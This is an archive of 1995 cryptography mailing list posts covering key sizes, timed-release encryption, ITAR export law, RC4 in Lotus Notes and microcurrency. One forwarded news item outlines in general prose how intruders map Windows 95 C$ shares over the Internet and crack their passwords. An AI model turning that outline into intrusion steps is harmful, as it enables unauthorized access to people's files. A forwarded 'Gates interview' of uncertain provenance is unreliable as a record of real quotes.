In-Reply-To: <199511090913.BAA08368@ix.ix.netcom.com>
Message-ID: <199511100142.RAA13467@servo.qualcomm.com>


>If speed is really a concern, you could do a 640 or 768 bit modulus

Hilarie suggested exactly this in private mail, and I've agreed. I'm
going to generate a 768-bit optional modulus.

Bill has also suggested a killer 4096-bit modulus for the truly
paranoid. Not sure my poor 32MB P90 can handle that without thrashing
its guts out, but I'll give it a try.

Phil





From liberty at gate.net  Thu Nov  9 19:06:59 1995
From: liberty at gate.net (Jim Ray)
Date: Fri, 10 Nov 1995 11:06:59 +0800
Subject: Meteors [NOISE]
Message-ID: <199511100156.UAA35213@tequesta.gate.net>


-----BEGIN PGP SIGNED MESSAGE-----

My car window was taken out 5 years ago in Saint Petersburg, FL by a golf-ball sized meteorite during the Pleaides Meteor Shower. I still
have the rock, and the glass cost me $100 (the insurance deductable).
Happily, I wasn't in my car at the time, but I no longer think of
meteor damage as a rare event. I've come to believe that Republicans
could be right, for the wrong reason, about SDI. As a Libertarian,
I find the problem of planetary meteor defense/avoidance troubling.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKKpjG1lp8bpvW01AQFmyQQAkjJXRNhhJtIKEDmxy3tGjy0TiJXpJIw6
MxujSnWgT5N2x+DBEkuVOfJrkqIXDsoO2lqR6SbYOb8NvtB5HdqQkU0sKNwxWe5Y
IN6LXKPbfQgfOVETFdRhtgRaYyyaGgdD9++U6wOwl6D5rsRnBcvPWXwzpAKmIC13
iAR0yPNCDNE=
=f160
-----END PGP SIGNATURE-----
Regards, Jim Ray

"When I visit Congress, I feel like Tom Paine in the Court of King George."
John Perry Barlow 

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty at gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From cme at clark.net  Thu Nov  9 20:00:23 1995
From: cme at clark.net (cme at clark.net)
Date: Fri, 10 Nov 1995 12:00:23 +0800
Subject: Cryptographic Random Numbers
Message-ID: <199511100310.WAA06420@clark.net>


I'm working on an appendix to the P1363 Public Key Standard draft covering
sources for and handling of cryptographic random numbers.  I've got a draft
on which I'd appreciate comments.  It's available as a web page:

	http://www.clark.net/pub/cme/CRN.html

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme at acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+





From beavis at bioanalytical.com  Thu Nov  9 20:40:50 1995
From: beavis at bioanalytical.com (Beavis B. Thoopit)
Date: Fri, 10 Nov 1995 12:40:50 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <acc7a170020210041a84@[205.199.118.202]>
Message-ID: <199511100331.WAA02410@bioanalytical.com>


Tim May responded:
> The tamper-proof (more correctly, "tamper-resistant" or
> "tamper-responding") hardware is so that attackers do not alter the clocks,
> as one example, to "speed up" the time release. Or grab the key, as another
> example.
>
> (Cranking up the clock speed may or may not be possible and still have the
> device work, but it's still an attack to consider.)
> 
> If the attacker can grab the internal state of the device, he can of course
> run the "transform" talked about above on his equipment.
> 
> >If the transform exists, it will ease/eliminate the reliance on the
> >"economics" of cryptography to build a tamper-proof physical device.
> 
> You'll need to more carefully argue your thesis. I cannot imagine a method,
> save perhaps for quantum computing techniques, which can avoid the need for
> "secure secrets," either via a person keeping a secret or a box keeping a
> secret.

Above, I said "ease/eliminate"... let me limit my claim to "ease".

I see 2 unique points in this scheme that I have not seen discussed
much:  1) Using _dynamics_ to _limit_ (maybe not prevent) penetration
of a system.  2) Using a feedback state machine in a heavily iterative
manner to hide the message.

The tamper-resistant circuits discussed (and some enjoying some
hopefully profitable sales) have been _static_.  There is no (of which
I am aware) continual change in the circuit/mechanism.  I propose a
device in some form of incessant motion (electrical or otherwise).
It seems a greater (thought I am sure not impossible) task to capture
the state of a moving target.  It seems that there may be a device
that inherently allows itself to be read serially (one bit after
another).

Add the feedback state machine to this (ephemeral) device, and you
may have a nice platform for time-released information.

The torsion-wire device described in a previous post is a nice example
of a device that allows access to only one bit at a time.  (Now, maybe
some sort of camera could be used to "see" all of the bits at once in
flight along the wire.  For argument, let's assume not.)  The problem
with the torsion wire device is that the math transform needs to live
somewhere between the two ends; access to the bits at the front and
back of the transform is not allowed.

I want something cheaper than a satellite, but beaming bits to a
satellite that performs the iterative, feedback transform and transmits
the transformed bits back home may
illustrate the type of platform needed.  It allows me to see only
one bit at a time.  The bits are munched each "round".  A delay is
inherent in the system and is not "acceleratable".

If this platform exists, how do I precompute a message to take
advantage of it?





From adam at lighthouse.homeport.org  Thu Nov  9 23:41:48 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 10 Nov 1995 15:41:48 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511080135.UAA05624@homeport.org>


Dan Weinstein wrote:

| The what U.S. law says and what U.S. officials can enforce are two
| different things.  You are in violation of ITAR if you send crypto
| software from Mexico to Europe over the INTERNET if it is routed
| through the U.S..  Think of it like drugs being shipped through the
| U.S., the drug lord that sent it throught is just as guilt under U.S.

	Its worth noting that IP is a packet routing system.  It does
not use paths or virtual circuits, like ATM or X.25.  This means that
it is not always possible to predict what route packets will follow.
This is especially true of non-interactive protocols like SMTP.  I can
traceroute to get a good idea of where my ftp packets are going right
now, but between the time I do the traceroute, send a mail message,
and it actually gets transmitted, a router somewhere along my old path
might have died, and my packets, unbeknownst to me, are taking a new
path.

	Thus, if the user in Italy has no reason to expect that their
mail to Germany will traverse the US, then I suspect that the US would
have a hard time proving any criminal act.  Doesn't a criminal act
require intent of some type?  If IP routing, in conjunction with SMTP,
beyond the control of the users, ships packets through the US, I have
a hard time believing that that makes those users criminals.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From stewarts at ix.netcom.com  Thu Nov  9 23:56:19 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 10 Nov 1995 15:56:19 +0800
Subject: Timed-release crypto and information economics
Message-ID: <199511100540.VAA26681@ix6.ix.netcom.com>


At 10:58 AM 11/9/95 -0500, "Beavis B. Thoopit" <beavis at bioanalytical.com> wrote:
>I have not yet convinced myself that a time-release information device
>is impossible....

Actually, if you don't mind only getting 3 seconds into the future,
moon-bounce is fairly simple and hard to tap on the uplink.
Unfortunately, most objects sufficiently far away to use this sort
of technique for practical applications are too small or distant to be 
good bounce targets, and some, like the Sun, are just not real cooperative.
For more expensive techniques, you could always launch a spaceship into a
cometary orbit, figuring out how long it'll take to come back.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From mark at lochard.com.au  Fri Nov 10 01:06:09 1995
From: mark at lochard.com.au (Mark)
Date: Fri, 10 Nov 1995 17:06:09 +0800
Subject: NOISE: Bill Gates view of SW Bugs and new releases - some quotes
Message-ID: <199511100853.AA35016@junkers.lochard.com.au>


Here is some signature fodder.

>FOCUS - is a German magazine
>
>
>FOCUS: Every new release of a software which has less bugs than the older
>       one is also more complex and has more features...
>Gates: No, only if that is what'll sell!
>
>FOCUS: But...
>Gates: Only if that is what'll sell! We've never done a piece of software
>       unless we thought it would sell. That's why everything we do in 
>       software ... it's really amazing: We do it because we think that's 
>       what customers want. That's why we do what we do.
>
>FOCUS: But on the other hand - you would say: Okay, folks, if you don't
>       like these new features, stay with the old version, and keep the bugs?
>Gates: No! We have lots and lots of competitors. The new version - it's not
>       there to fix bugs. That's not the reason we come up with a new version.
>
>FOCUS: But there are bugs an any version which people would really like to
>       have fixed.
>Gates: No! There are no significant bugs in our released software that any
>       significant number of users want fixed.
>
>FOCUS: Oh, my God. I always get mad at my computer if MS Word swallows the
>       page numbers of a document which I printed a couple of times with page
>       numbers. If I complain to anybody they say "Well, upgrade from 
>       version 5.11 to 6.0".
>Gates: No! If you really think there's a bug you should report a bug. Maybe
>       that you're not using it properly. Have you ever considered that?
>
>FOCUS: Yeah, I did...
>Gates: It turns out Luddites don't know how to use software properly, so
>       you should look into that. - The reason we come up with new versions 
>       is not to fix bugs. It's absolutely not. It's the stupidest reason to 
>       buy a new version I ever heard. When we do a new version we put in lots
>       of new things that people are asking for. And so, in no sense, is 
>       stability a reason to move to a new version. It's never a reason.
>
>FOCUS: How come I keep being told by computer vendors "Well, we know about
>       this bug, wait till the next version is there, it'll be fixed"? I hear 
>       this all the time. How come? If you're telling me there are no 
>       significant bugs in software and there is no reason to do a new version?
>Gates: No. I'm saying: We don't do a new version to fix bugs. We don't. Not
>      enough people would buy it. You can take a hundred people using Microsoft
>      Word. Call them up and say "Would you buy a new version because of bugs?"
>      You won't get a single person to say they'd buy a new version because of
>      bugs. We'd never be able to sell a release on that basis.
>
>FOCUS: Probably you have other contacts to your software developers. But if
>       Mister Anybody, like me, calls up a store or a support line and says, 
>       "Hey listen, there's a bug" ... 90 percent of the time I get the answer
>       "Oh, well, yeah, that's not too bad, wait to the next version and it'll
>       be fixed". That's how the system works.
>
>Gates: Guess how much we spend on phone calls every year.
>FOCUS: Hm, a couple of million dollars?
>
>Gates: 500 million dollars a year. We take every one of these phone calls
>       and classify them. That's the input we use to do the next version. 
>       So it's like the worlds biggest feedback loop. People call in - we 
>       decide what to do on it. Do you want to know what percentage of those 
>       phonecalls relates to bugs in the software? Less than one percent.
>
>FOCUS: So people call in to say "Hey listen, I would love to have this and
>       that feature"?
>Gates: Actually, that's about five percent. Most of them call to get advice
>      on how to do a certain thing with the software. That's the primary thing.
>      We could have you sit and listen to these phone calls. There are millions
>      and millions of them. It really isn't statistically significant. Sit in
>      and listen to Win 95 calls, sit in and listen to Word calls, and wait, 
>      just wait for weeks and weeks for someone to call in and say "Oh, I 
>      found a bug in this thing".
>...
>
>FOCUS: So where does this comon feeling of frustration come from that
>       unites all the PC users? Everybody experiences it every day that these
>       things simply don't work like they should.
>Gates: Because it's cool. It's like, "Yeah, been there done that - oh,
>       yeah, I know that bug." - I can understand that phenomenon 
>       sociologically, not technically.





From jcobb at ahcbsd1.ovnet.com  Fri Nov 10 01:51:46 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Fri, 10 Nov 1995 17:51:46 +0800
Subject: Above The "Minimum"
Message-ID: <Pine.BSD.3.91.951110042709.16321A-100000@ahcbsd1.ovnet.com>


 

Friend,


The following excerpt is reposted by permission of editor at cdt.org
(cdt = Center for Democracy and Technology).


CDT POLICY POST Number 28                      November 6, 1995

CONTENTS: (1) Senator Leahy Calls on FBI to Justify Surveillance Capacity
              Request
          (2) Text of Senator Leahy's Letter to FBI Director Freeh
          (3) Review of Digital Telephony Implementation to Date
          (4) How To Subscribe To The CDT Policy Post Distribution List
          (5) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor at cdt.org)

[snip]

(3) REVIEW OF DIGITAL TELEPHONY PROCESS TO DATE

[snip]

* DIRECT NEGOTIATIONS WITH TELECOMMUNICATIONS CARRIERS FOR
SURVEILLANCE
  CAPACITY ABOVE THE NATIONAL MINIMUM?

The FBI has proposed to undertake direct negotiations with
telecommunications carriers for surveillance capacity beyond the proposed
national minimum standard requested in the notice.

When Congress passed CALEA last year, it created a public process to bring
law enforcement's electronic surveillance ability under public scrutiny in
order to balance the new authority to influence the design of
telecommunications networks.

The public accountability provisions of CALEA require the FBI to publish
*all* surveillance capacity requests.  Congress must take a critical look
at this aspect of the FBI's proposal, and should not appropriate funds
until the FBI agrees to disclose all capacity requests, as required by the
law.

[snip]

To subscibe to the policy post distribution list, send mail to
"Majordomo at cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


                               ----


Cordially,

Jim










From cpunk at remail.ecafe.org  Fri Nov 10 02:18:48 1995
From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer)
Date: Fri, 10 Nov 1995 18:18:48 +0800
Subject: Win95 A Hacker's Net Dream
Message-ID: <199511101057.KAA01104@pangaea.ang.ecafe.org>


Windows 95 Is A Hacker's Dream Over The Internet


Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
with the Internet, could be a dream made in hacker
heaven. From seasoned propeller heads Newsbytes has
contacted, it looks like Windows 95 could be more of
a security nightmare than was first thought.

This is especially true where fixed link companies are
concerned. An investigation of the new operating system,
when hooked onto the Internet, leaves computers wide
open. Executing a series of simple, uncomplicated
commands opens up company and private users' computers to
hacking the moment they access the Internet, claim some
analysts.

Worse, they may never know it has been done. Using a
simple Unix command, a hacker can locate the IP (Internet
protocol) address of the subscriber logged into an
Internet service provider. Then he needs only one more
thing; a logged-on Internet user using Microsoft's new
operating system.

For businesses with leased line Internet links, it can
happen at any time, day or night. Once the IP address has
been noted, the hacker simply creates a file through DOS
on his own system, specifying the address and naming it.
Using two other commands -- which purge the remote names
on the IP, or Internet provider's port -- the system then
refreshes and remaps itself in preparation to be accessed
by the hacker's computer.

Because Windows 95 is designed with a networking
capability, it leaves all computers in the office open to
illegal access. Once the hacker has called up his Map
Network Drive, the hard disk on his own machine cannot be
differentiated from that of the genuine user. All that
need be done then is to put in a common drive name, most
obviously "C:\." For networked machines, the default "C$"
is common.

This gives access to all files on the subscriber's drive.
While Windows 95 allows the user to protect the drive by
giving it a password, computer experts Newsbytes talked
to said that device won't necessarily lock out intruders.
Because the operating system has no "audit" trail -- in
other words, it does not log who or how someone is
accessing the drive -- a hacker can spend weeks trying to
discover the password. Password search programs, like
Cracker, are readily available and can break through most
simple password sequences.

-----













From weidai at eskimo.com  Fri Nov 10 19:01:29 1995
From: weidai at eskimo.com (Wei Dai)
Date: Fri, 10 Nov 95 19:01:29 PST
Subject: Diffie-Hellman in GF(2^n)?
Message-ID: <Pine.SUN.3.91.951110184600.19312B-100000@eskimo.com>


Most Diffie-Hellman implementations currently use the multiplicative group
of prime fields.  However, the multiplicative group of finite fields of
characteristic 2 (GF(2^n)) can also be used and should be easier to
implement.  Is there any reason why they should not be used?  Does anyone
know the asymptotic running time of the best algorithm for calculating
discrete logarithms in GF(2^n)? 

Wei Dai





From j.d.stumbles at reading.ac.uk  Fri Nov 10 05:47:02 1995
From: j.d.stumbles at reading.ac.uk (John Stumbles)
Date: Fri, 10 Nov 1995 21:47:02 +0800
Subject: INFO BLACKOUT _fwd_
Message-ID: <"mail2.readin:061930:951110131700"@reading.ac.uk>


I saw this on the NZ.general newsgroup and had to share it with the list. 
'fraid it's just the reply - the  original must've expired by the time 
I got there (and I couldn't be bothered to go looking for an archive to 
track it down in).

Enjoy...

>ab330 at torfree.net (Bob Allisat) wrote:
>
>
>>Powerful national security insiders have established effective control
>>over the entrance gateways to the Internet. Disturbing signs are now 
>>emerging that the "information superhighway" has been targeted for 
>>systematic surveillance and political dossier-building on Americans'
>>opinions.
>
>	Oh, really?
>
>>SAIC is a $2 billion defense and FBI contractor with a board of
>>directors that reads like a Who's Who of the intelligence community.
>>Board members include Admiral Bobby Ray Inman, the former director of
>>the National Security Agency (NSA) and deputy director of the CIA; Melvin
>>Laird, defense secretary under Richard Nixon; Donald Hicks, former head
>>of research and development for the Pentagon; Donald Kerr, former head
>>of the Los Alamos National Laboratory; and General Maxwell Thurman 
>>(ret.), the commander of the U.S. invasion of Panama.
>
>>The corporation also has a legion of computer network specialists and
>>an entire division of computer consultants. 
>
>		As does IBM, DEC, AT&T, MicroSoft, shal I go on?
>
>>SAIC currently holds contracts
>>for re-engineering the Pentagon's information systems, automating the
>>FBI's computerized fingerprint identification system, and building a
>>national criminal history and information system.
>
>	Nope, I believe that's DISA's job now (was DCA)
>
>>The Internet is a marvel of computer softward technology. It was designed
>>to survive a nuclear attach on the United States--like the Post Office,
>>it's literally smart enough to find a way to get the mail through even if
>>most of the network is missing.
>
>	Wow, TCP/IP is a marvel?  this guy must hate Novell.
>
>>But control of the Internet domain name registration means the ability
>>to remove troublesome--or outspoken--computer systems from the network.
>>Potentially, this control also confers the power to insinuate "phantom"
>>domains into the network--for surveillance purposes, for example,--or
>>for real-time, automatic censorship.
>	So the government can wipe out all nameservers at once?  This is
>geting better....
>
>>Furthermore, anecdotal evidence gathered by this author (Matthews)
>>suggests that actual "truth control" is taking place on the net now.
>>E-mail messages with controversial contents--including details of the
>>SAIC takeover of domain names--have consistently disappeared as they
>>travel across the network. News items concerning the Vincent Foster
>>"suicide" investigation and allegations of NSA bank spying through
>>compromised Inslaw softward are being quickly and automatically 
>>cancelled. And the cancellations are not by their authors.
>
>	Must be a bad MX server somewhere.
>
>>With domain names under the control of secret government insiders, it
>>is even theoretically possible that large parts of the Internet could
>>be shut down and silenced at critical times. This could be accomplished
>>by suddenly altering domain name registration or interposing compromised 
>>"domains" at critical points. These compromised systems could serve as
>>"black holes" at critical times, stopping e-mail and important news
>>from reaching the world -- or the rest of the country.
>
>	Well that means well just have to use IP addresses, right?
>
>>Exercises in "turning the Internet off" have already taken place in
>>Taiwan and Hong Kong. In Taiwan the 'net was successfully shut down.
>>All network traffic--including news, opinions, and e-mail sent by computer
>>users was successfully "bottled up" on the island and prevented from
>>reaching the world.
>
>		It sure is easy to cut an island off, but a continent or more?
>
>>In Hong Kong the Internet wasn't quite strangled, but the British auth-
>>orities who control that colony managed to throttle free electronic speech
>>with the rest of the world until everything was bottlenecked into a few
>>little-known satellite links.
>
>>These are alarming precedents and sure signs that powerful, shadowy
>>forces are preparing to chop at the very roots of America's new Liberty
>>Tree. The secretive people on the board of directors of SAIC are intelli-
>>gence professionals skilled at manufacturing events--and then 
>>manufacturing public opinion and consent by controlling the truth. Will 
>>Internet disinformation, censor-ship or "shutdowns" signal the next American
>>crisis?
>
>	So, you basically said that the government is willing to cripple
>itself by shutting down the Internet and MILNET.  This guy needs a
>kick in the teeth or something to wake him up.  Next thing you know is
>that he'l claim to be abducted but CIA agents posing as Elvis
>impersonators.  And he'll start believing elis still lives.
>
>		-Dale
>

John Stumbles                                      j.d.stumbles at reading.ac.uk
Computer Services, University of Reading       http://www.rdg.ac.uk/~suqstmbl 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+





From cme at TIS.COM  Fri Nov 10 07:21:59 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 10 Nov 1995 23:21:59 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <199511092232.OAA08016@comsec.com>
Message-ID: <9511101445.AA26394@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>From: "Beavis B. Thoopit" <beavis at bioanalytical.com>
>Date: Thu, 9 Nov 1995 10:58:03 -0500 (EST)

>I have not yet convinced myself that a time-release information device
>is impossible....
>
>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device?  Torsion wire memory device?


The only one I've been able to think of (from this thread on sci.crypt
several years ago) was a message, e.g., PGP encrypted with two different
public keys K1 and K2:

	E(K1, E(K2, E(K1, E(K2, ..., E(K1, X)...))))

with private key 1 here on Earth and private key 2 a reasonable distance
away -- e.g., Mars.

The time it takes to decrypt this *can* be lower-bounded, assuming the
private keys remain secret.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNleVQXJENzYr45AQH9VQP/ddsthyo+HERj85a9vjAVVfQN/37wTZae
oz0qlT3iQbdTWeYlTuCjWdpfknZBqrfb3JkiUI1wGuCc7d5UZc9rCm5aB0kRL83q
IpSx5KQTaELQDULwaHcdPjbGIkCdvtpjQPHumm1lFy1XgM2zo+LbEoiyvlld6d+W
pxSIppefmvA=
=Bcs+
-----END PGP SIGNATURE-----





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Fri Nov 10 08:47:04 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Sat, 11 Nov 1995 00:47:04 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <m0tDvw0-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>



I did say that I would discuss the apparent disagreement between Mr.
Froomkin and myself on the issue of the seperation of powers and the
validity of the ITAR.  But, since I think that we were rather at
cross-purposes and not in any real disagreement--and since the subject
is a fair distance from the core concerns of this list--I will keep
this response short.  

The first place where Mr. Froomkin and I got at cross-purposes was
when I said:

  I would admit that a court might do this in an effort to hold the
  statute constitutional, but a court might also hold the regulations
  unconstitutional because they are overbroad.

And Mr. Froomkin replied:

  Technically, this is holding the regulations ultra vires, not
  unconsitutional; the difference matters.

which, at first, rather confused me, until I realized that in my haste
I had been assuming--since I automatically think of constitutional
challenges to the ITAR in terms of the first amendment--that the
``unconstitutionality'' in question was that of violating the first
amendment and was applying the first amendment doctrine of
``overbreadth'' to a constitutional challenge that might have been
based on some other ground, like ``lack of jurisdiction'', and yet Mr.
Froomkin's response seemed to relate to my separation of powers
argument, which can, of course, be quite properly be called an ``ultra
vires'' argument.

I think that it was my failure to keep the different strands of my
various arguments separate that is responsible for our apparent
disagreement here, and for that I apologize.

But I do think that Mr. Froomkin is wrong in claiming that holding the
regulations ultra vires is not the same as holding them
unconstitutional.  (I agree, however, that if one were to challenge
the regulations in a proceeding in the nature of quo warranto brought
under the Administrative Procedure Act, one would probably not talk
about the regulations being ``unconstitutional''; on the other hand, I
also have my doubts about whether one would use the phrase ``ultra
vires'' in such a proceeding.)  When a defendant in a criminal case
raises the defense that the regulations he is charged with violating
are ``ultra vires'' because Congress did not authorize them, that most
certainly is a constitutional issue, involving the supremacy clause,
the due process clause, the ninth-amendment, and the doctrine of
separation of powers.

But perhaps I still misunderstand what argument of mine--or that I
appeared to make--was the one to which Mr. Froomkin attached the
``ultra vires'' label.  

In any case, I want to thank him for doing so, because it brought home
to me the important fact that it is possible that the ITAR provisions
relating to cryptographic software could be struck down, not because
they violate the first amendment, or would violate it if passed by
congress, and not because the court is trying to dodge the difficult
first amendment issue, but simply because the provisions are not
authorized by any legislation.

In any case, my separation of powers argument appears in Junger, Down
Memory Lane: The Case of the Pentagon Papers, 23 CWRU L. Rev. 3
(1971).

After counting noses in the Pentagon Papers case I concluded that the
the only position that arguably was agreed to by a majority of the
justices in the case was that the injunction that the government
sought was not authorized by Congress, and that therefore the
government was not entitled to the relief that it sought.  And I
suggested that this meant that the court never determined whether
Congress could have passed a valid law authorizing the ``prior
restraint'' in such a case.  And finally I suggested that that was not
a bad way of avoiding a difficult constitutional question under the
first amendment.  (Or at least that is a thumb-nail sketch of how I read
the article now.)

With this explanation, I don't know whether Mr. Froomkin would persist
in his statement that:

  It's too far off topic to pursue any further, but I must take
  exception to the suggestion that we are well served by separation of
  powers intruding into other legal domains.  Bowsher tells us that
  causation principles go out the window in SOP cases.  That alone
  makes it radioactive.

I must admit that I don't know what it is that he is refering to.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From Charlie_Kaufman/Iris.IRIS at iris.com  Fri Nov 10 08:59:09 1995
From: Charlie_Kaufman/Iris.IRIS at iris.com (Charlie Kaufman/Iris)
Date: Sat, 11 Nov 1995 00:59:09 +0800
Subject: Lotus Notes RSA Implementation Question
Message-ID: <9511102035.AA6927@moe.iris.com>


>If anyone on the list has knowledge of the following items, I would be
>very gratefull.
>
>1)  What is the key size used by the USA licensed version?
>
Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
encryption in the exportable version and bigger keys for signatures in all
versions and for encryption in the USA version. I'm not sure I'm allowed to say
what the key size will be ahead of the product shipping.

>2)  Considering RC4 is a proprietary scheme, have there been any
>concerted efforts to validate it's strength or lack of?  If so, could
>you give a pointer to any documents I could review.
>
There has been considerable discussion of the security of RC4 on this list, and
some subtle (i.e. worrisome but not disasterous) weaknesses have been
found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
to date because it does not encrypt recognizable plaintext with the first few
bytes of the RC4 stream.

>...Bob Glassley
>

 --Charlie Kaufman
 (charlie_kaufman at iris.com)






From tjunker at phoenix.phoenix.net  Sat Nov 11 01:04:46 1995
From: tjunker at phoenix.phoenix.net (Thomas Junker)
Date: Sat, 11 Nov 95 01:04:46 PST
Subject: the revolution of microcurrency
Message-ID: <199511110904.DAA12059@phoenix.net>


On  9 Nov 95 at 15:47, Vladimir Z. Nuri <vznuri at netcom.com> 
wrote:

> Subject:       the revolution of microcurrency

> the topic of "microcurrency" has come up on this list
> ...<snip>
> touting it as a revolutionary change in the economy. I
> ...<snip>
> agree with this wholeheartedly. the possibility that
> people can
> ...<snip>
> will all contribute to a REVOLUTIONARY effect on culture.

> my key idea on all of this is that the whole idea of
> copyright is going to melt when you introduce cash, not
> be strengthened. 

I don't think so.

> there are a lot of people out there who
> think that one has to try to put a lock and chain on web
> pages or whatever that one is "selling", and the
> horrible problem of the net is that anything can be
> copied. and these people are feverishly working on
> specious "solutions" to this "problem" right now.

What's happening is that while some people try to impose
book and magazine notions onto the Web, others gleefully
splatter the landscape with everything from the interesting
to the awful but are generally stopped short of making a
living at it by the absence of workable means of asking for
and receiving nominal sums.  

Meanwhile, some other people are realizing that today's
$30/yr newsletter of 20,000 circulation will become
tomorrow's 25-cent-per-copy newsletter of 2 or 3 hundred
thousand "circulation," making more total money and
reaching and influencing far more people. A much larger
volume of information will be worth a penny or less for a
peek.  When those transactions become close to transparent
and of unnoticeable latency, *then* we will see the
explosion that will put present Web growth into
perspective as the baby crawl that it is.

This doesn't amount to putting locks and chains on Web 
pages any more than newsstands put locks and chains on 
newspapers or magazines.  When it's cheap enough and the 
transaction is a no-brainer, the buyer gets easy access 
while the publisher has reason to be there publishing, and 
neither worries too much about the value of the single 
copy.

> says, "you have to protect what you are selling from
> other people or you won't make any money". this theme

No, the point is that you have to have a way of making 
something or you won't have any incentive to generate the 
information or make it available to others.  The news for 
today is that the way of making something on small amounts 
of low-value information is almost at hand.

> I submit that things like the release of public domain
> standards and products like Java and Netscape for free
> are not merely blips at this moment but increasingly are
> going to be the marketing plan of the future. the idea is
> that you give away your product for FREE, 

Standards are not the product.  Standards are what help
make a market possible for products that must interface
with other products.  The closed-system people may have 
seen this in the momentary light of their extinction.

> and then people pay you if they like it. 

Don't hold your breath.

> this new ideology will be relevant to products that are
> not "things" but in fact are more in the realm of
> intellectual property, i.e. writing, software,
> cyberspace web pages, etc.

Intellectual property is not new.  What's new are
distribution and fee collection systems with the potential
for incremental costs approaching zero.  Most of the
infrastructure for that is in place, in fact has been in
place for quite a few years.  What has been missing has 
been the critical mass of users actually participating, and 
near-zero cost payment mechanisms.  I'm spectacularly 
disappointed by the initial ecash and payment offerings, 
since they seem to miss the whole point and be aimed at 
web-transacted business no different that the high-overhead 
transactions that take place face-to-face in retail stores 
and by phone and mail.

> the beauty of this system is that NO LONGER is
> "unauthorized" distribution" the "enemy". it is your
> FRIEND, a key aspect of profit!!

Freely-distributable shareware has been around for 10-15 
years, and has grown from being the computer field's butt 
for bad jokes to a maturing distribution methodology that 
supports an increasing number of author/publishers offering 
some quite substantial and solid products.  It did this, 
by the way, without substantial benefit or contribution 
from the Internet or the Web.

> product to "authorized users". (i.e. those who pay in
> advance). our entire society thinks within this paradigm,

A big part of what is happening with microtransaction
evolution is that the buyer will be able to consider,
decide, and pay, all in the space of a second.  You can
forget about anything based on paying in "advance," and
all those draconian mechanisms -- they won't exist because
they won't need to exist.  Instant payment at very low
prices collapses whole ranges of problems that no longer
need be addressed.

> a rather extraordinary new economy can replace this,
> that of voluntary payment. 

We have "voluntary payment" now in most transactions not
involving the government.

> you DISDAIN things like copyright, because they prevent
> your "product" from reaching the eyes of potential
> customers. your goal is actually to distribute the
> product as far as possible, in a sort of pyramid-like
> scheme. you want your "customers" to distribute your
> product to their friends, so that those "friends"
> potentially become customers in an endless cycle.

You don't actually collect anything, though.  I guess you 
make it up in volume, right?

> this approach works amazingly with writing. imagine that
> if John Markoff suddenly QUIT the NYT and just wrote
> articles on his own. and imagine that at the bottom, you
> see a message, "for more of the same, send .5c or more to
> markoff at liberated.com". I submit that in the future,
> Markoff will probably be able to make more money than he
> does at NYT, because he is eliminating the middleman. the
> newspaper company is primarily built as a *distribution*
> channel. suddenly he doesn't have to pay anything out of
> his own salary, so to speak, for distribution.
> distribution is *free*. he doesn't require anyone else
> to do it for him. he puts his article in an apropriate
> place on the net and it circulates like a VIRUS if it is
> well received. the more people that see the article, the
> more people that pay him money.

You've got *part* of an idea here, but it's mixed up with
another idea.  It is already common for people with
service or product to sell to offer "free" information in
the form of articles, papers, small utilities, demos that
may actually have some use, and occasionally, fully
functional products.  In the field of intellectual
property in the electronic age, the incremental cost of a
copy approaches zero, so there is no great investment in
doing this.  There is, however, always something larger
FOR SALE, something that is being promoted by the
favorable exposure.  What is being given away is not the
final product one hopes to sell -- it is a loss leader,
something that in the field of information costs precious
little to run off.

> in an information system, individual objects have no
